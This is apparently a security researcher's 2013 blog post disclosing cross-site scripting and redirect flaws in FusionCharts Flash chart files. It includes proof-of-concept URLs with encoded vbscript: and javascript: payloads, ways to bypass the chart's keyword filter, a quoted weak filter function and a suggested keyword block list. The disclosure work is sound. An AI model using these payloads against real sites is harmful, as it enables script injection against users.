29 March 2013
29 March 2013,
 0

Below, you’ll find my finding in regard to FusionCharts Vulnerabilities:

A) I found that it was possible for an attacker to execute an XSS attack by loading an external XML File through the dataURL Parameter.

In this event, an attacker can use the link parameter (http://docs.fusioncharts.com/charts/contents/DrillDown/LinkFormat.html) in order to execute JavaScript payloads on the client

For example (Click the Graph for XSS PoC):

 

http://nirgoldshlager.site50.net/Column3D.swf?dataURL=http://files.nirgoldshlager.com/Data.xml

When the victim clicks on the malicious graph, the XSS Payload runs on their client.

B) An attacker can carry out a redirection attack (New Tab) in Firefox. This is achievable through the use of the LogoURL Parameter.

This parameter effectively permits the attacker to load an external swf file. To successfully perform a redirection attack, the attacker must use the req.send function in ActionScript and then use the malicious swf file.

Req.send function:

(req.send(“http://nirgoldshlager.com”, “_blank”, “GET”);),

 

PoC:

http://nirgoldshlager.site50.net/Column3D.swf?dataURL=http://files.nirgoldshlager.com/Data.xml 

 

Solution:

Cross Domain Policy file:

http://www.adobe.com/devnet-docs/acrobatetk/tools/AppSec/CrossDomain_PolicyFile_Specification.pdf

 

What about the anti-XSS Regex Action Script?

We’re all familiar with the old debugmode=1 Bug in FusionChart, correct?

I have taken an extensive look into FusionChart’s Action Script and I’ve found that they do not have adequate measures in place to block a cross site scripting attack using regex to match dangerous XSS attempts.

The FusionChart Action Script is attempting to block the Dataurl=XXX XSS Attack with the use of a poor regex that focuses only on JavaScript and asfunction keywords. Don’t let the colon check fool you, however. The check is only performed in the event that JavaScript or asfunction are detected.

 

Line 126-128:

 

function filterXSSChars(strURL)

{

if (_isOnline == true && ((strURL.toLowerCase().indexOf(“javascript”) != -1 || strURL.toLowerCase().indexOf(“asfunction”) != -1) && (strURL.indexOf(“:”) != -1 || strURL.indexOf(“%3A”) != -1)))

 

An attacker can easily bypass this regex in IE with the use of vbscript rather than JavaScript.

PoC:

 

http://nirgoldshlager.site50.net/MSLinelatest.swf?debugMode=1&dataURL=%27%3E%3Ca%20href=%27vbscript:alert%286%29%27%3E%3Cfont%20size=%22100%22%20%3EClick%20Me%20For%20XSS%3C/font%3E%3C/a%3E%3C%3E

 

It’s also possible to use data:text/html to bypass it or mocha and livescript for the older version in Netscape.

The correct solution might look like:

asfunction|javascript|vbscript|data|mocha|livescript|feed|pcast (Thanks to @irsdl for the feed tip, And @Milad_Bahari for the pcast, (feed,pcast XSS Works on some older versions of Firefox)

 

As discovered by security researcher “Ben Hayak”(@benhayak)

A new parameter (defaultDataFile) has been shown to have some vulnerabilities to the new XSS Attack. This parameter can be used in the event that the DataURL parameter is either protected or blocked.

Line 125:

 

var _defaultDataFile = unescape(getFirstValue(rootAttr.defaultdatafile, “Data.xml”));

 

This parameter can be used to execute an XSS attack.

 

PoC:

 

http://nirgoldshlager.site50.net/MSLinelatest.swf?debugMode=1&defaultDataFile=%27%3E%3Ca%20href=%27javascript:alert%286%29%27%3E%3Cfont%20size=%22100%22%20%3EClick%20Me%20For%20XSS%3C/font%3E%3C/a%3E%3C%3E

Leave a Reply

Your email address will not be published. Required fields are marked *